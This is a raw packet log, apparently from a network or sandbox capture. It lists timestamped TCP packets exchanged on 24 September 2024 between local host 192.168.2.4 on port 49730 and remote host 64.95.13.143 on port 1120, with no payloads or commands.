Sep 24, 2024 17:46:11.388834000 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.388843060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388854980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388864994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.388870955 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.388902903 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.389331102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389347076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389349937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389355898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389359951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389367104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389389038 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.389421940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.389950991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389962912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389972925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.389992952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390008926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390019894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390031099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390037060 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390041113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390053988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390081882 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390104055 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390682936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390697002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390707016 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390717030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390727997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390738964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390742064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390790939 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390858889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390871048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390882015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390892982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390908003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.390908957 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.390927076 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.392122984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392138004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392144918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392155886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392168045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392190933 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.392224073 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.392963886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392981052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.392993927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393006086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393065929 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.393457890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393476963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393491983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393515110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393531084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.393541098 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.393572092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.394160032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.394220114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.450913906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.450938940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.450951099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.451008081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.451169014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.451184034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.451196909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.451209068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.451273918 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.451292992 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.475461960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475481033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475492954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475508928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475533009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.475543022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475563049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475574017 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.475579977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475599051 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.475620985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.475894928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475909948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475920916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475930929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.475950003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.475971937 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.476227045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476238012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476248026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476277113 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.476371050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476388931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476414919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.476553917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476568937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476583004 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476593971 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476598024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.476607084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.476620913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.476726055 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.476891994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477051973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477062941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477072954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477077961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477088928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477103949 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.477130890 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.477178097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477957010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.477971077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478003025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.478112936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478123903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478137970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478164911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.478192091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.478401899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478413105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478429079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478446960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478457928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478466034 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.478468895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478478909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.478483915 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.478518009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.479348898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.479360104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.479372025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.479382038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.479398966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.479398966 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.479439020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.479470968 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.480060101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.480099916 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.480248928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.480282068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.480293989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.480307102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.480318069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.480349064 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.480365038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481194973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481210947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481224060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481237888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481250048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.481251001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481266022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481280088 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.481285095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481343985 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.481815100 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481836081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481898069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.481976986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.481992960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482023001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482029915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482031107 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.482038021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482059002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.482777119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482801914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482824087 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.482908010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482922077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482935905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482944965 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.482949972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482963085 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.482971907 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.482975960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483009100 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.483685017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483700037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483712912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483726025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483728886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.483740091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483755112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.483772039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.483804941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.484618902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484635115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484649897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484664917 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484668970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.484709024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.484751940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484767914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484781981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.484793901 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.484838963 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.485251904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485393047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485414028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485435009 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.485565901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485580921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485605001 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.485613108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485620975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.485652924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.486263037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486279964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486294031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486306906 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.486308098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486324072 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486340046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486345053 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.486377954 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.486392975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.486429930 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.487097979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487114906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487129927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487144947 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487168074 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.487200975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.487216949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487231970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487246037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.487272024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.488225937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.488276005 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.540544987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540688992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540699005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540745020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.540927887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540940046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540954113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540966988 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.540996075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.565825939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.565865993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.565871000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.565937042 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.566018105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566037893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566045046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566051006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566095114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.566531897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566735029 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566786051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566792011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566803932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.566900969 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.567260027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567266941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567277908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567326069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.567490101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567497015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567507982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567560911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.567828894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567836046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567842007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567847013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567852974 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567858934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567874908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.567892075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.567929983 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.568666935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568675995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568685055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568696022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568702936 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568713903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568720102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.568763971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.568779945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.569333076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.569349051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.569375992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.569384098 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.569390059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.569395065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.569397926 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.569421053 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.569447994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.570476055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.570482969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.570493937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.570506096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.570518017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.570523024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.570534945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.570559025 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.571285009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571291924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571301937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571309090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571314096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571325064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571331024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571340084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.571345091 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.571368933 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.572127104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572134018 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572139025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572144985 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572149992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572165012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572170019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.572184086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.572207928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.573082924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573091030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573096037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573101997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573108912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573116064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.573122025 CEST	1120	49730	64.95.13.143	192.168.2.4
